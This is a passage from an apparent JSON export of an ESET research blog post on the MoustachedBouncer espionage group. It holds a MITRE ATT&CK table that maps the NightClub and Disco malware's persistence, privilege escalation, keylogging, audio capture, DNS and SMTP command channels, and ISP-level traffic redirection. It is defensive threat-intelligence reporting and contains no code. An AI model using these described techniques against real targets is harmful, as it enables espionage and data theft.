scheduled task that downloads an executable from a \u201cfake\u201d SMB share every minute.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1543\/003\"><em>T1543.003<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Create or Modify System Process: Windows Service<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub persists as a <\/span><span><span lang=\"EN-US\">ServiceDll<\/span><\/span><span lang=\"EN-US\"> of a service named <\/span><span><span lang=\"EN-US\">WmdmPmSp<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Privilege Escalation<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1068\"><em>T1068<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Exploitation for Privilege Escalation<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco has a plugin to exploit the CVE-2021-1732 local privilege escalation vulnerability.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Defense Evasion<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1140\/\"><em><span>T1140<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Deobfuscate\/Decode Files or Information<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Since 2020, NightClub has used an external configuration file encrypted with RSA.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Collection<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1005\"><em>T1005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data from Local System<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub steals recent files from the local system.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1025\"><em>T1025<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data from Removable Media<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub steals files from the local system.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1056\/001\"><em>T1056.001<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Input Capture: Keylogging<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub has a plugin to record keystrokes.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1113\"><em>T1113<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Screen Capture<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub and Disco each have a plugin to take screenshots.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1123\/\"><em><span>T1123<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Audio Capture<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub has a plugin to record audio.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"7\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Command and Control<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/002\"><em>T1071.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: File Transfer Protocols<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"PT-BR\">Disco communicates via the SMB protocol.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/003\"><em>T1071.003<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: Mail Protocols<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub communicates via the SMTP protocol.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/004\/\"><em><span>T1071.004<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: DNS<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">One of the NightClub plugins is a backdoor that communicates via DNS.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1132\/001\"><em>T1132.001<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Encoding: Standard Encoding<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub encodes files, attached to email, in base64.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1132\/002\"><em>T1132.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Encoding: Non-Standard Encoding<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub encodes commands and responses sent via its DNS C&amp;C channel with a modified form of base64.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1573\/001\/\"><em><span>T1573.001<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Encrypted Channel: Symmetric Cryptography<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub receives plugins in email attachments, encrypted using AES-CBC.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1557\"><em>T1557<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Adversary-in-the-Middle<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer has performed AitM at the ISP level to redirect its targets to a fake Windows Update page. It has also done AitM on the SMB protocol to deliver malicious files from \u201cfake\u201d servers.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Exfiltration<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1041\"><em>T1041<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Exfiltration Over C2 Channel<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub and Disco exfiltrate data over the C&amp;C channel (SMTP, SMB, and DNS).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Impact<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1565\/002\"><em>T1565.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Manipulation: Transmitted Data Manipulation<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer has modified the HTTP traffic from specific IP addresses at the ISP level in order to redirect its targets to a fake Windows Update page.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2022\/12\/eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Long-term espionage against diplomats, leveraging email-based C&#038;C protocols, C++ modular backdoors, and adversary-in-the-middle (AitM) attacks\u2026 Sounds like the infamous Turla? Think again!<\/p>\n","protected":false},"author":5,"featured_media":8430,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-8429","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8429","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=8429"}],"version-history":[{"count":0,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8429\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=8429"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=8429"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=8429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}